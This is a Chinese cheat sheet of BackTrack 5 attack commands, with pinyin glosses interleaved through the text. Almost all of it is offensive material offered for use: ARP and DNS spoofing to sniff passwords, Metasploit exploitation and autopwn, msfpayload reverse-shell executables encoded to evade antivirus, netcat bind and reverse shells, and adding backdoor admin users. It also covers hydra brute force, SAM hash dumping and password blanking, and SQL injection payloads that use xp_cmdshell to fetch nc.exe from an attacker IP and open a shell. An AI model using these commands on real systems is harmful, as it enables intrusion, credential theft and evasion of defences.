BackTrack渗(shèn)透测(cè)试笔记是一款BT5学习笔(bǐ)记,使用BT5的同学(xué)可以(yǐ)看看,不仅仅是用(yòng)来破(pò)解(jiě)WIFI,BT5还有更强大的功能(néng)。 体(tǐ)积小,但(dàn)功能强大。界(jiè)面(miàn)非常清爽,简单易操作(zuò)。
0x01.1 PTES 标准中的渗透测试阶(jiē)段
0x01.1.1 前期交互(hù)阶段(duàn)
0x01.1.2 情报搜集阶段
0x01.1.3 威(wēi)胁建模阶段
0x01.1.4 漏洞分析阶段
0x01.1.5 渗透攻(gōng)击阶段
0x01.1.6 后渗透攻击阶段
0x01.1.7 报告阶段
0x01.2 渗透测试类型
0x01.2.1 白盒测试(shì)
0x01.2.2 黑盒测试(shì)
0x01.3 小(xiǎo)结
0x02 渗透环境搭建
>
0x03 常(cháng)用(yòng)信息收集(jí)
0x03.1 被(bèi)动信息收(shōu)集
0x03.2 主动信息(xī)收集
0x03.3 针(zhēn)对性扫描
0x03.4 小结(jié)
0x04 信(xìn)息收(shōu)集(jí)的附属工作
0x04.1 基本(běn)的(de)漏(lòu)洞扫描
0x04.2 使用 Nessus 进行扫描
0x04.3 专用漏洞扫(sǎo)描器
0x05 社会工程学攻击
0x05.1 针对性(xìng)的(de)钓鱼攻(gōng)击
0x05.2 web 向量(liàng)攻击(jī)
0x05.3 SET 的(de)其他特性
0x05.4 小结。
ping 域名/ip 测试本机(jī)到远(yuǎn)端(duān)主机是否联通。
dig 域名/ip 查看域名解析的(de)详细信息。
host -l 域名 dns服务器(qì) 传(chuán)输zone。
扫描
nmap:
-sS 半(bàn)开(kāi)扫描(miáo)TCP和SYN扫描。
-sT 完全TCP连接扫描(miáo)。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防(fáng)火墙探测)
-PN 不ping。
-n 不dns解(jiě)析。
-A -O和-sV。
-O 操作系统识(shí)别(bié)。
-sV 服务(wù)版本信息(banner)
-p 端口扫描。
-T 设置时间级(jí)别(bié)(0-5)
-iL 导入扫描结果。
-oG 输(shū)出扫描(miáo)结果。
操作系(xì)统(tǒng)识别:
p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域(yù)名 检测os。
banner获(huò)取:
nc ip port 检测端口(kǒu)是否打开。
telnet ip port 检测(cè)端口是否(fǒu)打(dǎ)开。
wget ip 下载主页(yè)。
cat index.html | more 显示主页代码(mǎ)。
q 退出。
windows枚举(jǔ)
nmap -sS -p 139,445 ip 扫描windows。
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP 检测netbioses。
smbgetserverinfo -i targetIP 扫描(miáo)name,os,组。
smbdumpusers -i targetIP 列出用户(hù)。
smbclient -L //targetIP 列出共享。
使用windows:
net use \\ip\ipc$ "" /u:"" 开启空会话。
net view \\ip 显示共享信息。
smbclient:
smbclient -L hostName -I targetIP 枚举共享。
smbclient -L hostName/share -U "" 用空用户连接。
smbclient -L hostName -I targetIP -U admin普通用户(hù)连(lián)接。
rpcclient:
rpcclient targetIP -U ""打开一(yī)个空(kōng)会话。
netshareenum 枚举共享。
enumdomusers 枚举用户。
lsaenumsid 枚举域SID。
queryuser RID 查询用(yòng)户信息。
createdomuser 创建用户访(fǎng)问(wèn)。
ARP欺(qī)骗(piàn):
ettercap:
nano /usr/local/etc/etter.conf配置文件
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓(zhuā)包(bāo)的网卡
Hosts > Scan for hosts (do this two times)扫描网段的主机(jī)
Hosts > Hosts list 显(xiǎn)示主机列表
Select the default gateway > Add to Target 1 添加主机
Select the target > Add to Target 2 添加主机
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击
Start > Start sniffing 开(kāi)始(shǐ)攻(gōng)击
dsniff -i eth0 监听网卡(kǎ)窃听登录用户密码
urlsnarf -i eth0 嗅探(tàn)http请求
msgsnarf -i eth0 嗅探聊(liáo)天软件(jiàn)的聊天内容
driftnet -i eth0 网络(luò)管(guǎn)理嗅探图片,音频。
dns欺骗:
nano /usr/local/share/ettercap/etter.dns编辑(jí)配置文件
Plugins > Manage the plugins > dns_spoof 设(shè)置(zhì)dns欺(qī)骗
Mitm > Arp poisoning > Sniff remote connections > OK 设置(zhì)ARP
Start > Start sniffing 开始攻击(jī)
Exploits漏洞(dòng)利用:
cd /pentest/exploits/exploit-db 进入目录
cat sploitlist.txt | grep -i [exploit] 查询需要(yào)的(de)漏(lòu)洞(dòng)
cat exploit | grep "#include"检查运行环境
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运(yùn)行的代码
Metasploit:
svn update 升(shēng)级
./msfweb Web接(jiē)口(kǒu)127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助(zhù)
show <option> 显示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options 显示(shì)选项(xiàng)
set <OPTION NAME> <option> 设置选项
show payloads 显示装置
set PAYLOAD <payload name> 设(shè)置装置
show options 显(xiǎn)示(shì)选项
set <OPTION NAME> <option> 设置选项
show targets 显示(shì)目标(os版本)
set TARGET <target number> 设置(zhì)目标版本
exploit 开始(shǐ)漏洞攻击
sessions -l 列出会话
sessions -i <ID> 选择会话
sessions -k <ID> 结束会话
<ctrl> z 把(bǎ)会话放到(dào)后台(tái)
<ctrl> c 结束会话
jobs 列出漏洞运行工作(zuò)
jobs -K 结束一个漏洞运行(háng)工(gōng)作
show auxiliary 显示辅(fǔ)助(zhù)模块(kuài)
use <auxiliary name> 使用辅(fǔ)助模块
set <OPTION NAME> <option> 设(shè)置(zhì)选项
run 运行(háng)模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试(shì)mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正(zhèng)向
Target behind firewall: reverse shell反向
Meterpreter衔接不(bú)懂(dǒng)dos的可以用这个:
db_import_nessus_nbe 加载(zǎi)nessus的扫描(miáo)结果
db_import_nmap_xml 加载nmap的扫(sǎo)描结果
自动化攻(gōng)击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字(zì)符(fú)接口攻击流程:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
做木马后门等(děng):
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
编码(mǎ)处理就是做免杀(shā):
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t c
入侵后在windows下添加(jiā)管理员(yuán)用户:
hostname 查看(kàn)主机名
net users 查看用户
net user 用户 密码 /add 添加用(yòng)户
net localgroup 查看工(gōng)作组
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用(yòng)户加(jiā)入管理员组
TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下(xià)载
netcat瑞士军刀(dāo)
attacker: 10.1.1.1
target: 10.1.1.2
nc -v -z 10.1.1.2 1-1024 端口扫描
target: nc -lvp 4444 聊天设置(服务)
attacker: nc -v 10.1.1.2 4444 聊天(tiān)设置(zhì)(客(kè)户)
target: nc -lvp 4444 > output.txt传输文件(接受)
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发(fā)送)
target: nc -lvp 4444 -e cmd.exe Bind shell。
attacker: nc -v 10.1.1.2 4444
target:nc -lvp 4444 Reverse shell。
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
密码
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示(shì)个数(30多万个)
暴力(lì):
hydra -l ftp -P words -v targetIP ftp 攻(gōng)击ftp。
hydra -l muts -P words -v targetIP pop3 攻击(jī)pop3
hydra -P words -v targetIP snmp 攻(gōng)击snmp
攻击(jī)microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r target.com –accept=pdf 下载pdf文档
wyd.pl -o output.txt .target.com/
cat output.txt | more
SAM文件(jiàn)(windows下的密码文(wén)件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份(fèn)windows的(de)hash文件(jiàn):
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWS\system32> pwdump \\127.0.0.1
john破解密(mì)码:
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
彩(cǎi)虹表:
rcrack *.rt -f hash.txt
本地修改(gǎi)密码:
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1 挂载c盘
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备(bèi)份sam文件
直接修改sam文(wén)件:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot
SQL 注入
nmap -sS -p 1521 targetIP 扫描oracle
nmap -sS -p T:1433,U:1434 targetIP 扫描(miáo)mssql
' or 1=1–验证(zhèng)旁路(lù)
列(liè)举表名:
' having 1=1–
' group by table having 1=1–
' group by table, table2 having 1=1–
' group by table, table2, table3 having 1=1–
列举列(liè)类型:
union select sum(column) from table –
union select sum(column2) from table –
添加(jiā)数(shù)据:
' ; insert into table values('value','value2′,'value3′)–
MSSQL存储程序(xù):
输出(chū)数据库中(zhōng)备案信息到一个html文件(jiàn),您可以查看与一个浏览(lǎn)器。
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.html
运(yùn)行ipconfig在浏览器查看信息。
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txt
上(shàng)传后门。
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –
攻(gōng)击者: nc -lvp 53
spreadfold。
bt5,全(quán)称Back Track five,是继bt3,bt4之后的最新版。这是一个linux环境的(de)便携(xié)系统,可以放(fàng)到U盘或者硬(yìng)盘中启动,对本身硬盘没有(yǒu)影响,无需在本(běn)地安(ān)装。内置大量(liàng)的网(wǎng)络安全检(jiǎn)测工具以(yǐ)及黑客破解软件等。
